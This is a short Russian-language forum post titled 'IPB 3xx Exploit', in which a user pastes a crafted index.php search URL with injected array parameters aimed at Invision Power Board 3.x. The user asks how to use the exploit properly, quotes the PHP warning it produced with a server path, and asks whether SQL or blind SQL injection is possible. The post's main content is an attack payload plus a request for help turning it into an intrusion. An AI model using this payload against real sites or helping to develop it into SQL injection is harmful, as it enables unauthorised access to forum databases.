Тема: IPB 3xx Exploit
Показать сообщение отдельно

  #1  
Старый 28.10.2016, 14:18
zheneck221
Новичок
Регистрация: 27.04.2016
Сообщений: 2
С нами: 5287286

Репутация: 0
По умолчанию

index.php?andor_type=and&app=core&do=search&module =search&search_app=core&search_app_filters[core][searchInKey]=&search_app_filters[core][sortDir]=1&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_author=1&search_content=both&search_d ate_end=01/01/1967&search_date_start=01/01/1967&search_term=1&sid[$muciex]=1

Помогите пожалуйста правильно использовать этот exploit. При вставке кода в адресную строку на главной странице появляется Warning: substr() expects parameter 1 to be string, array given in /var/www/cerega/data/www/admin/sources/base/core.php on line 5595

Есть ли тут sql или blind sql ?
 
Ответить с цитированием